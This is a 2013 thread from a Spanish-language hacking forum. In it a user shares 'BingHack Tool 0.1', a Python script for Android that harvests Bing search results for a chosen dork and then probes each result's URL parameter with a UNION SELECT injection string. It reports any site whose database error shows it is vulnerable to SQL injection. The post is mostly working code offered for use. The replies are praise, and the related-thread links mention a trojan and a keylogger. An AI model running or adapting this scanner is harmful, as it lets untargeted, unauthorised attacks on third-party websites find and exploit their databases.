comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Python-Android] BingHack Tool 0.1

  • 2 Respuestas
  • 1449 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Septiembre 01, 2013, 04:19:36 pm »
Un simple script en Python para Android con el fin de buscar paginas vulnerables a SQLI usando Bing.


El codigo :

Código: Python
  1. #!usr/bin/python
  2. #BingHack Tool 0.1
  3. #Android Version
  4. #(C) Doddy Hackman 2013
  5.  
  6. import android,urllib2,re
  7.  
  8. nave = urllib2.build_opener()  
  9. nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
  10.  
  11. def toma(web) :
  12.  nave = urllib2.Request(web)
  13.  nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  14.  op = urllib2.build_opener()
  15.  return op.open(nave).read()
  16.  
  17. def sql(webs):
  18.  respuesta = ""
  19.  for web in webs :
  20.   if re.findall("=",web):
  21.    web = re.split("=",web)
  22.    web = web[0]+"="
  23.  
  24.    try:
  25.     code = toma(web+"-1+union+select+1--")
  26.     if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  27.      respuesta = respuesta + "[SQLI] : "+web+"\n"
  28.    except:
  29.     pass
  30.  return respuesta
  31.  
  32. def limpiar(pag):
  33.  
  34.  limpia = []
  35.  for p in pag:
  36.   if p not in limpia:
  37.    limpia.append(p)
  38.  return limpia
  39.  
  40. def buscar(dork,count):
  41.  
  42.  respuesta = ""
  43.  
  44.  pag = []
  45.  s = 10  
  46.  
  47.  while s <= int(count):
  48.   try:
  49.    code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
  50.    d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
  51.    s += 10
  52.    for a in d:
  53.     pag.append(a)
  54.   except:
  55.    pass
  56.  
  57.  pag = limpiar(pag)
  58.  
  59.  return pag
  60.  
  61. aplicacion = android.Android()
  62.  
  63. def menu():
  64.  
  65.  aplicacion.dialogCreateAlert("BingHack Tool 0.1")
  66.  aplicacion.dialogSetItems(["Search","About","Exit"])
  67.  aplicacion.dialogShow()
  68.  re = aplicacion.dialogGetResponse().result
  69.  re2 = re["item"]
  70.  
  71.  if re2==0:
  72.  
  73.   red = aplicacion.dialogGetInput("BingHack Tool 0.1","Write the dork")
  74.   dork = str(red[1])
  75.  
  76.   red = aplicacion.dialogGetInput("BingHack Tool 0.1","Write the number of pages to search")
  77.   paginas = str(red[1])
  78.  
  79.   aplicacion.dialogCreateSpinnerProgress("BingHack Tool 0.1","Searching ...")
  80.   aplicacion.dialogShow()
  81.  
  82.   founds = ""
  83.   rez = ""
  84.   rtafinal = ""
  85.  
  86.   founds = buscar(dork,paginas)
  87.  
  88.   aplicacion.dialogDismiss()
  89.  
  90.   aplicacion.dialogCreateSpinnerProgress("BingHack Tool 0.1","Scanning ...")
  91.   aplicacion.dialogShow()
  92.  
  93.   rez = sql(founds)
  94.  
  95.   if len(rez) == 0 :
  96.    rtafinal = "[-] Not Found"
  97.   else :
  98.    rtafinal = "[++] Pages Founds\n\n"
  99.    rtafinal = rtafinal + rez
  100.    rtafinal = rtafinal + "\n[++] Finished\n"
  101.  
  102.   aplicacion.dialogDismiss()
  103.  
  104.   aplicacion.dialogCreateAlert("BingHack Tool 0.1",rtafinal)
  105.   aplicacion.dialogSetPositiveButtonText("Done")
  106.   aplicacion.dialogShow()
  107.  
  108.   op = aplicacion.dialogGetResponse().result
  109.   if op["which"] == "positive" :
  110.    menu()
  111.  
  112.  if re2==1 :
  113.   aplicacion.dialogCreateAlert("BingHack Tool 0.1","(C) Doddy Hackman 2013")
  114.   aplicacion.dialogSetPositiveButtonText("Done")
  115.   aplicacion.dialogShow()
  116.   re3 = aplicacion.dialogGetResponse().result
  117.   if re3["which"] == "positive" :
  118.    menu()
  119.  
  120.   if re3==2:
  121.    aplicacion.exit()
  122.  
  123. menu()
  124.  
  125. # The End ?
  126.  

Eso es todo.
« Última modificación: Marzo 23, 2015, 12:44:46 pm por Expermicid »

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #1 en: Septiembre 01, 2013, 10:05:29 pm »
excelente jefe
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado Flemon

  • *
  • Underc0der
  • Mensajes: 235
  • Actividad:
    0%
  • Reputación 0
  • NO HAY FORMA DE DETENERME!!
    • Ver Perfil
    • Email
« Respuesta #2 en: Septiembre 01, 2013, 11:04:55 pm »
Muy bueno e ingenioso... excelente!!!!
No intentes pararme, trata de defenderte, trata de matarme, pero de cualqueir forma TE SUPERARE

 

¿Te gustó el post? COMPARTILO!



[Código] Yardas a metros - Metros a yardas [Python]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1346
Último mensaje Mayo 29, 2011, 01:27:34 am
por LucaSthefano
Python Trojan - By "bLiNdFiR3"

Iniciado por d33k40

Respuestas: 1
Vistas: 1979
Último mensaje Abril 03, 2010, 11:01:59 pm
por Dharok
Python phpmyadmin "BruteForce"

Iniciado por linkgl

Respuestas: 2
Vistas: 2443
Último mensaje Agosto 19, 2011, 12:14:37 pm
por linkgl
Python keylogger - by "bLiNdFiR3"

Iniciado por d33k40

Respuestas: 0
Vistas: 1969
Último mensaje Abril 07, 2010, 03:30:22 am
por d33k40
[Código] Entero / No Entero [Ejercicio - Python]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1301
Último mensaje Mayo 29, 2011, 01:24:09 am
por LucaSthefano